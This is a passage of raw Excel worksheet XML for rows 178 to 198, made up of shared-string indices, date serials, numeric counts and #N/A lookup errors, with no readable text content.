      </c>
    </row>
    <row r="178" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A178" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B178" s="51">
        <v>43782.06062045139</v>
      </c>
      <c r="C178" s="1" t="s">
        <v>3108</v>
      </c>
      <c r="D178" s="26">
        <v>121</v>
      </c>
      <c r="E178" s="1" t="s">
        <v>3260</v>
      </c>
      <c r="F178" s="26">
        <v>101</v>
      </c>
      <c r="G178" s="57" t="s">
        <v>3261</v>
      </c>
      <c r="H178" s="1" t="s">
        <v>3262</v>
      </c>
      <c r="I178" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J178" s="1" t="s">
        <v>186</v>
      </c>
      <c r="K178" s="1" t="s">
        <v>16</v>
      </c>
      <c r="L178" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M178" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N178" s="1"/>
      <c r="O178" s="1" t="s">
        <v>1390</v>
      </c>
      <c r="P178" s="1" t="s">
        <v>1824</v>
      </c>
      <c r="Q178" s="1" t="s">
        <v>3662</v>
      </c>
      <c r="R178" s="82">
        <v>17915</v>
      </c>
      <c r="S178" s="82">
        <v>13548</v>
      </c>
      <c r="T178" s="82">
        <v>106570</v>
      </c>
      <c r="U178" s="82">
        <v>158841</v>
      </c>
      <c r="V178" s="82">
        <v>180854</v>
      </c>
      <c r="W178" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="179" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A179" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B179" s="51">
        <v>43767.499909386577</v>
      </c>
      <c r="C179" s="1" t="s">
        <v>3108</v>
      </c>
      <c r="D179" s="26">
        <v>121</v>
      </c>
      <c r="E179" s="1" t="s">
        <v>3263</v>
      </c>
      <c r="F179" s="26">
        <v>101</v>
      </c>
      <c r="G179" s="57" t="s">
        <v>3264</v>
      </c>
      <c r="H179" s="1" t="s">
        <v>3265</v>
      </c>
      <c r="I179" s="1" t="s">
        <v>611</v>
      </c>
      <c r="J179" s="1" t="s">
        <v>612</v>
      </c>
      <c r="K179" s="1" t="s">
        <v>14</v>
      </c>
      <c r="L179" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M179" s="1" t="s">
        <v>612</v>
      </c>
      <c r="N179" s="1" t="s">
        <v>613</v>
      </c>
      <c r="O179" s="1" t="s">
        <v>2122</v>
      </c>
      <c r="P179" s="1" t="s">
        <v>612</v>
      </c>
      <c r="Q179" s="1" t="s">
        <v>3662</v>
      </c>
      <c r="R179" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S179" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T179" s="82">
        <v>1749</v>
      </c>
      <c r="U179" s="82">
        <v>2539</v>
      </c>
      <c r="V179" s="82">
        <v>1545</v>
      </c>
      <c r="W179" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="180" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A180" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B180" s="51">
        <v>43783.664907627317</v>
      </c>
      <c r="C180" s="1" t="s">
        <v>3266</v>
      </c>
      <c r="D180" s="26">
        <v>100</v>
      </c>
      <c r="E180" s="1" t="s">
        <v>3267</v>
      </c>
      <c r="F180" s="26">
        <v>100</v>
      </c>
      <c r="G180" s="57" t="s">
        <v>3268</v>
      </c>
      <c r="H180" s="1" t="s">
        <v>2388</v>
      </c>
      <c r="I180" s="1" t="s">
        <v>31</v>
      </c>
      <c r="J180" s="1" t="s">
        <v>262</v>
      </c>
      <c r="K180" s="1" t="s">
        <v>31</v>
      </c>
      <c r="L180" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M180" s="1" t="s">
        <v>262</v>
      </c>
      <c r="N180" s="1" t="s">
        <v>263</v>
      </c>
      <c r="O180" s="1"/>
      <c r="P180" s="1"/>
      <c r="Q180" s="1" t="s">
        <v>161</v>
      </c>
      <c r="R180" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S180" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T180" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U180" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V180" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W180" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="181" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A181" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B181" s="51">
        <v>43783.664907615741</v>
      </c>
      <c r="C181" s="1" t="s">
        <v>3266</v>
      </c>
      <c r="D181" s="26">
        <v>100</v>
      </c>
      <c r="E181" s="1" t="s">
        <v>3269</v>
      </c>
      <c r="F181" s="26">
        <v>100</v>
      </c>
      <c r="G181" s="57" t="s">
        <v>3270</v>
      </c>
      <c r="H181" s="1" t="s">
        <v>1492</v>
      </c>
      <c r="I181" s="1" t="s">
        <v>31</v>
      </c>
      <c r="J181" s="1" t="s">
        <v>262</v>
      </c>
      <c r="K181" s="1" t="s">
        <v>31</v>
      </c>
      <c r="L181" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M181" s="1" t="s">
        <v>262</v>
      </c>
      <c r="N181" s="1" t="s">
        <v>263</v>
      </c>
      <c r="O181" s="1"/>
      <c r="P181" s="1"/>
      <c r="Q181" s="1" t="s">
        <v>161</v>
      </c>
      <c r="R181" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S181" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T181" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U181" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V181" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W181" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="182" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A182" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B182" s="51">
        <v>44125.826187777777</v>
      </c>
      <c r="C182" s="1" t="s">
        <v>3271</v>
      </c>
      <c r="D182" s="26">
        <v>110</v>
      </c>
      <c r="E182" s="1" t="s">
        <v>3272</v>
      </c>
      <c r="F182" s="26">
        <v>110</v>
      </c>
      <c r="G182" s="57" t="s">
        <v>3273</v>
      </c>
      <c r="H182" s="1" t="s">
        <v>1425</v>
      </c>
      <c r="I182" s="1" t="s">
        <v>172</v>
      </c>
      <c r="J182" s="1" t="s">
        <v>173</v>
      </c>
      <c r="K182" s="1" t="s">
        <v>13</v>
      </c>
      <c r="L182" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M182" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N182" s="1"/>
      <c r="O182" s="1" t="s">
        <v>3274</v>
      </c>
      <c r="P182" s="1"/>
      <c r="Q182" s="1" t="s">
        <v>3678</v>
      </c>
      <c r="R182" s="82">
        <v>194</v>
      </c>
      <c r="S182" s="82">
        <v>62</v>
      </c>
      <c r="T182" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U182" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V182" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W182" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="183" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A183" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B183" s="51">
        <v>43787.387686284725</v>
      </c>
      <c r="C183" s="1" t="s">
        <v>3142</v>
      </c>
      <c r="D183" s="26">
        <v>110</v>
      </c>
      <c r="E183" s="1" t="s">
        <v>3276</v>
      </c>
      <c r="F183" s="26">
        <v>100</v>
      </c>
      <c r="G183" s="57" t="s">
        <v>3277</v>
      </c>
      <c r="H183" s="1" t="s">
        <v>3278</v>
      </c>
      <c r="I183" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J183" s="1" t="s">
        <v>76</v>
      </c>
      <c r="K183" s="1" t="s">
        <v>15</v>
      </c>
      <c r="L183" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M183" s="1" t="s">
        <v>90</v>
      </c>
      <c r="N183" s="2" t="s">
        <v>221</v>
      </c>
      <c r="O183" s="1" t="s">
        <v>3279</v>
      </c>
      <c r="P183" s="1" t="s">
        <v>222</v>
      </c>
      <c r="Q183" s="1" t="s">
        <v>3667</v>
      </c>
      <c r="R183" s="82">
        <v>141850</v>
      </c>
      <c r="S183" s="82">
        <v>104322</v>
      </c>
      <c r="T183" s="82">
        <v>644396</v>
      </c>
      <c r="U183" s="82">
        <v>1004509</v>
      </c>
      <c r="V183" s="82">
        <v>1051208</v>
      </c>
      <c r="W183" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="184" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A184" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B184" s="51">
        <v>43892.685863321756</v>
      </c>
      <c r="C184" s="1" t="s">
        <v>3290</v>
      </c>
      <c r="D184" s="26">
        <v>100</v>
      </c>
      <c r="E184" s="1" t="s">
        <v>3291</v>
      </c>
      <c r="F184" s="26">
        <v>100</v>
      </c>
      <c r="G184" s="57" t="s">
        <v>3292</v>
      </c>
      <c r="H184" s="1" t="s">
        <v>3293</v>
      </c>
      <c r="I184" s="1" t="s">
        <v>203</v>
      </c>
      <c r="J184" s="1" t="s">
        <v>204</v>
      </c>
      <c r="K184" s="1" t="s">
        <v>28</v>
      </c>
      <c r="L184" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M184" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N184" s="1"/>
      <c r="O184" s="1"/>
      <c r="P184" s="1"/>
      <c r="Q184" s="1" t="s">
        <v>2312</v>
      </c>
      <c r="R184" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S184" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T184" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U184" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V184" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W184" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="185" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A185" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B185" s="51">
        <v>43907.505775127313</v>
      </c>
      <c r="C185" s="1" t="s">
        <v>3296</v>
      </c>
      <c r="D185" s="26">
        <v>111</v>
      </c>
      <c r="E185" s="1" t="s">
        <v>3297</v>
      </c>
      <c r="F185" s="26">
        <v>100</v>
      </c>
      <c r="G185" s="57" t="s">
        <v>3298</v>
      </c>
      <c r="H185" s="1" t="s">
        <v>3299</v>
      </c>
      <c r="I185" s="1" t="s">
        <v>203</v>
      </c>
      <c r="J185" s="1" t="s">
        <v>204</v>
      </c>
      <c r="K185" s="1" t="s">
        <v>24</v>
      </c>
      <c r="L185" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M185" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N185" s="1"/>
      <c r="O185" s="1"/>
      <c r="P185" s="1"/>
      <c r="Q185" s="1" t="s">
        <v>3661</v>
      </c>
      <c r="R185" s="82">
        <v>69</v>
      </c>
      <c r="S185" s="82">
        <v>95</v>
      </c>
      <c r="T185" s="82">
        <v>488</v>
      </c>
      <c r="U185" s="82">
        <v>676</v>
      </c>
      <c r="V185" s="82">
        <v>1122</v>
      </c>
      <c r="W185" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="186" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A186" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B186" s="51">
        <v>44008.481357233795</v>
      </c>
      <c r="C186" s="1" t="s">
        <v>3296</v>
      </c>
      <c r="D186" s="26">
        <v>111</v>
      </c>
      <c r="E186" s="1" t="s">
        <v>3300</v>
      </c>
      <c r="F186" s="26">
        <v>201</v>
      </c>
      <c r="G186" s="57" t="s">
        <v>3301</v>
      </c>
      <c r="H186" s="1" t="s">
        <v>2299</v>
      </c>
      <c r="I186" s="1" t="s">
        <v>203</v>
      </c>
      <c r="J186" s="1" t="s">
        <v>204</v>
      </c>
      <c r="K186" s="1" t="s">
        <v>24</v>
      </c>
      <c r="L186" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M186" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N186" s="1"/>
      <c r="O186" s="1"/>
      <c r="P186" s="1" t="s">
        <v>1824</v>
      </c>
      <c r="Q186" s="1" t="s">
        <v>3661</v>
      </c>
      <c r="R186" s="82">
        <v>1</v>
      </c>
      <c r="S186" s="82">
        <v>1</v>
      </c>
      <c r="T186" s="82">
        <v>2</v>
      </c>
      <c r="U186" s="82">
        <v>2</v>
      </c>
      <c r="V186" s="82">
        <v>5</v>
      </c>
      <c r="W186" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="187" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A187" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B187" s="51">
        <v>43847.510102187502</v>
      </c>
      <c r="C187" s="1" t="s">
        <v>3175</v>
      </c>
      <c r="D187" s="26">
        <v>151</v>
      </c>
      <c r="E187" s="1" t="s">
        <v>3302</v>
      </c>
      <c r="F187" s="26">
        <v>101</v>
      </c>
      <c r="G187" s="57" t="s">
        <v>3303</v>
      </c>
      <c r="H187" s="1" t="s">
        <v>2358</v>
      </c>
      <c r="I187" s="1" t="s">
        <v>179</v>
      </c>
      <c r="J187" s="1" t="s">
        <v>180</v>
      </c>
      <c r="K187" s="1" t="s">
        <v>19</v>
      </c>
      <c r="L187" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M187" s="1"/>
      <c r="N187" s="1"/>
      <c r="O187" s="1" t="s">
        <v>2359</v>
      </c>
      <c r="P187" s="1" t="s">
        <v>181</v>
      </c>
      <c r="Q187" s="1" t="s">
        <v>3670</v>
      </c>
      <c r="R187" s="82">
        <v>298</v>
      </c>
      <c r="S187" s="82">
        <v>200</v>
      </c>
      <c r="T187" s="82">
        <v>1421</v>
      </c>
      <c r="U187" s="82">
        <v>2520</v>
      </c>
      <c r="V187" s="82">
        <v>2383</v>
      </c>
      <c r="W187" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="188" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A188" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B188" s="51">
        <v>43762.390177233799</v>
      </c>
      <c r="C188" s="1" t="s">
        <v>3175</v>
      </c>
      <c r="D188" s="26">
        <v>151</v>
      </c>
      <c r="E188" s="1" t="s">
        <v>3304</v>
      </c>
      <c r="F188" s="26">
        <v>100</v>
      </c>
      <c r="G188" s="57" t="s">
        <v>3305</v>
      </c>
      <c r="H188" s="1" t="s">
        <v>3306</v>
      </c>
      <c r="I188" s="1" t="s">
        <v>179</v>
      </c>
      <c r="J188" s="1" t="s">
        <v>180</v>
      </c>
      <c r="K188" s="1" t="s">
        <v>19</v>
      </c>
      <c r="L188" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M188" s="1"/>
      <c r="N188" s="1"/>
      <c r="O188" s="1" t="s">
        <v>3307</v>
      </c>
      <c r="P188" s="1" t="s">
        <v>920</v>
      </c>
      <c r="Q188" s="1" t="s">
        <v>3670</v>
      </c>
      <c r="R188" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S188" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T188" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U188" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V188" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W188" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="189" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A189" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B189" s="51">
        <v>44082.361591064815</v>
      </c>
      <c r="C189" s="1" t="s">
        <v>2378</v>
      </c>
      <c r="D189" s="26">
        <v>100</v>
      </c>
      <c r="E189" s="1" t="s">
        <v>3308</v>
      </c>
      <c r="F189" s="26">
        <v>100</v>
      </c>
      <c r="G189" s="57" t="s">
        <v>3309</v>
      </c>
      <c r="H189" s="1" t="s">
        <v>3310</v>
      </c>
      <c r="I189" s="1" t="s">
        <v>31</v>
      </c>
      <c r="J189" s="1" t="s">
        <v>262</v>
      </c>
      <c r="K189" s="1" t="s">
        <v>31</v>
      </c>
      <c r="L189" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M189" s="1" t="s">
        <v>262</v>
      </c>
      <c r="N189" s="1" t="s">
        <v>263</v>
      </c>
      <c r="O189" s="1"/>
      <c r="P189" s="1"/>
      <c r="Q189" s="1" t="s">
        <v>3655</v>
      </c>
      <c r="R189" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S189" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T189" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U189" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V189" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W189" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="190" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A190" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B190" s="51">
        <v>44082.36159104167</v>
      </c>
      <c r="C190" s="1" t="s">
        <v>2378</v>
      </c>
      <c r="D190" s="26">
        <v>100</v>
      </c>
      <c r="E190" s="1" t="s">
        <v>3311</v>
      </c>
      <c r="F190" s="26">
        <v>100</v>
      </c>
      <c r="G190" s="57" t="s">
        <v>3312</v>
      </c>
      <c r="H190" s="1" t="s">
        <v>2377</v>
      </c>
      <c r="I190" s="1" t="s">
        <v>31</v>
      </c>
      <c r="J190" s="1" t="s">
        <v>262</v>
      </c>
      <c r="K190" s="1" t="s">
        <v>31</v>
      </c>
      <c r="L190" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M190" s="1" t="s">
        <v>262</v>
      </c>
      <c r="N190" s="1" t="s">
        <v>263</v>
      </c>
      <c r="O190" s="1"/>
      <c r="P190" s="1"/>
      <c r="Q190" s="1" t="s">
        <v>3655</v>
      </c>
      <c r="R190" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S190" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T190" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U190" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V190" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W190" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="191" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A191" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B191" s="51">
        <v>43942.496504606483</v>
      </c>
      <c r="C191" s="1" t="s">
        <v>3313</v>
      </c>
      <c r="D191" s="26">
        <v>101</v>
      </c>
      <c r="E191" s="1" t="s">
        <v>3314</v>
      </c>
      <c r="F191" s="26">
        <v>101</v>
      </c>
      <c r="G191" s="57" t="s">
        <v>3315</v>
      </c>
      <c r="H191" s="1" t="s">
        <v>3316</v>
      </c>
      <c r="I191" s="1" t="s">
        <v>179</v>
      </c>
      <c r="J191" s="1" t="s">
        <v>1006</v>
      </c>
      <c r="K191" s="1" t="s">
        <v>23</v>
      </c>
      <c r="L191" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M191" s="1" t="s">
        <v>1006</v>
      </c>
      <c r="N191" s="1" t="s">
        <v>1007</v>
      </c>
      <c r="O191" s="1" t="s">
        <v>3317</v>
      </c>
      <c r="P191" s="1"/>
      <c r="Q191" s="1" t="s">
        <v>151</v>
      </c>
      <c r="R191" s="82">
        <v>11</v>
      </c>
      <c r="S191" s="82">
        <v>3</v>
      </c>
      <c r="T191" s="82">
        <v>39</v>
      </c>
      <c r="U191" s="82">
        <v>641</v>
      </c>
      <c r="V191" s="82">
        <v>2819</v>
      </c>
      <c r="W191" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="192" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A192" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B192" s="51">
        <v>44021.851558125003</v>
      </c>
      <c r="C192" s="1" t="s">
        <v>3318</v>
      </c>
      <c r="D192" s="26">
        <v>101</v>
      </c>
      <c r="E192" s="1" t="s">
        <v>3319</v>
      </c>
      <c r="F192" s="26">
        <v>101</v>
      </c>
      <c r="G192" s="57" t="s">
        <v>3320</v>
      </c>
      <c r="H192" s="1" t="s">
        <v>2592</v>
      </c>
      <c r="I192" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J192" s="1" t="s">
        <v>186</v>
      </c>
      <c r="K192" s="1" t="s">
        <v>16</v>
      </c>
      <c r="L192" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M192" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N192" s="1"/>
      <c r="O192" s="1" t="s">
        <v>2593</v>
      </c>
      <c r="P192" s="1" t="s">
        <v>677</v>
      </c>
      <c r="Q192" s="1" t="s">
        <v>3679</v>
      </c>
      <c r="R192" s="82">
        <v>8234</v>
      </c>
      <c r="S192" s="82">
        <v>6256</v>
      </c>
      <c r="T192" s="82">
        <v>49340</v>
      </c>
      <c r="U192" s="82">
        <v>73062</v>
      </c>
      <c r="V192" s="82">
        <v>85331</v>
      </c>
      <c r="W192" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="193" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A193" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B193" s="51">
        <v>43748.941609791669</v>
      </c>
      <c r="C193" s="1" t="s">
        <v>3199</v>
      </c>
      <c r="D193" s="26">
        <v>173</v>
      </c>
      <c r="E193" s="1" t="s">
        <v>3322</v>
      </c>
      <c r="F193" s="26">
        <v>130</v>
      </c>
      <c r="G193" s="57" t="s">
        <v>3323</v>
      </c>
      <c r="H193" s="1" t="s">
        <v>3324</v>
      </c>
      <c r="I193" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J193" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K193" s="1" t="s">
        <v>21</v>
      </c>
      <c r="L193" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M193" s="1"/>
      <c r="N193" s="1" t="s">
        <v>3208</v>
      </c>
      <c r="O193" s="1"/>
      <c r="P193" s="1"/>
      <c r="Q193" s="1" t="s">
        <v>3672</v>
      </c>
      <c r="R193" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S193" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T193" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U193" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V193" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W193" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="194" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A194" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B194" s="51">
        <v>44140.032963622682</v>
      </c>
      <c r="C194" s="1" t="s">
        <v>3199</v>
      </c>
      <c r="D194" s="26">
        <v>206</v>
      </c>
      <c r="E194" s="1" t="s">
        <v>3322</v>
      </c>
      <c r="F194" s="26">
        <v>132</v>
      </c>
      <c r="G194" s="57" t="s">
        <v>3323</v>
      </c>
      <c r="H194" s="1" t="s">
        <v>3324</v>
      </c>
      <c r="I194" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J194" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K194" s="1" t="s">
        <v>21</v>
      </c>
      <c r="L194" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M194" s="1"/>
      <c r="N194" s="1" t="s">
        <v>3208</v>
      </c>
      <c r="O194" s="1" t="s">
        <v>3325</v>
      </c>
      <c r="P194" s="1"/>
      <c r="Q194" s="1" t="s">
        <v>3673</v>
      </c>
      <c r="R194" s="82">
        <v>23103</v>
      </c>
      <c r="S194" s="82">
        <v>12603</v>
      </c>
      <c r="T194" s="82">
        <v>80018</v>
      </c>
      <c r="U194" s="82">
        <v>151727</v>
      </c>
      <c r="V194" s="82">
        <v>174106</v>
      </c>
      <c r="W194" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="195" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A195" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B195" s="51">
        <v>43748.941609780093</v>
      </c>
      <c r="C195" s="1" t="s">
        <v>3199</v>
      </c>
      <c r="D195" s="26">
        <v>173</v>
      </c>
      <c r="E195" s="1" t="s">
        <v>3326</v>
      </c>
      <c r="F195" s="26">
        <v>120</v>
      </c>
      <c r="G195" s="57" t="s">
        <v>3327</v>
      </c>
      <c r="H195" s="1" t="s">
        <v>1074</v>
      </c>
      <c r="I195" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J195" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K195" s="1" t="s">
        <v>21</v>
      </c>
      <c r="L195" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M195" s="1"/>
      <c r="N195" s="1" t="s">
        <v>3208</v>
      </c>
      <c r="O195" s="1"/>
      <c r="P195" s="1"/>
      <c r="Q195" s="1" t="s">
        <v>3672</v>
      </c>
      <c r="R195" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S195" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T195" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U195" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V195" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W195" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="196" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A196" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B196" s="51">
        <v>43748.941609780093</v>
      </c>
      <c r="C196" s="1" t="s">
        <v>3199</v>
      </c>
      <c r="D196" s="26">
        <v>206</v>
      </c>
      <c r="E196" s="1" t="s">
        <v>3326</v>
      </c>
      <c r="F196" s="26">
        <v>120</v>
      </c>
      <c r="G196" s="57" t="s">
        <v>3327</v>
      </c>
      <c r="H196" s="1" t="s">
        <v>3328</v>
      </c>
      <c r="I196" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J196" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K196" s="1" t="s">
        <v>21</v>
      </c>
      <c r="L196" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M196" s="1"/>
      <c r="N196" s="1" t="s">
        <v>3208</v>
      </c>
      <c r="O196" s="1" t="s">
        <v>2973</v>
      </c>
      <c r="P196" s="1"/>
      <c r="Q196" s="1" t="s">
        <v>3673</v>
      </c>
      <c r="R196" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S196" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T196" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U196" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V196" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W196" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="197" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A197" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B197" s="51">
        <v>43872.595933576391</v>
      </c>
      <c r="C197" s="1" t="s">
        <v>3199</v>
      </c>
      <c r="D197" s="26">
        <v>173</v>
      </c>
      <c r="E197" s="1" t="s">
        <v>3329</v>
      </c>
      <c r="F197" s="26">
        <v>143</v>
      </c>
      <c r="G197" s="57" t="s">
        <v>3330</v>
      </c>
      <c r="H197" s="1" t="s">
        <v>3045</v>
      </c>
      <c r="I197" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J197" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K197" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L197" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M197" s="1" t="s">
        <v>290</v>
      </c>
      <c r="N197" s="16" t="s">
        <v>291</v>
      </c>
      <c r="O197" s="1"/>
      <c r="P197" s="1"/>
      <c r="Q197" s="1" t="s">
        <v>3672</v>
      </c>
      <c r="R197" s="82">
        <v>6</v>
      </c>
      <c r="S197" s="82">
        <v>9</v>
      </c>
      <c r="T197" s="82">
        <v>64</v>
      </c>
      <c r="U197" s="82">
        <v>710</v>
      </c>
      <c r="V197" s="82">
        <v>383</v>
      </c>
      <c r="W197" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="198" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A198" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B198" s="51">
        <v>44109.56779202546</v>
      </c>
      <c r="C198" s="1" t="s">
        <v>3199</v>
      </c>
      <c r="D198" s="26">
        <v>206</v>
      </c>
      <c r="E198" s="1" t="s">
        <v>3329</v>
      </c>
      <c r="F198" s="26">
        <v>204</v>
      </c>
      <c r="G198" s="57" t="s">
        <v>3330</v>
      </c>
      <c r="H198" s="1" t="s">
        <v>3045</v>
      </c>
      <c r="I198" s="16" t="s">
        <v>268</v>
      </c>
      <c r="J198" s="1" t="s">
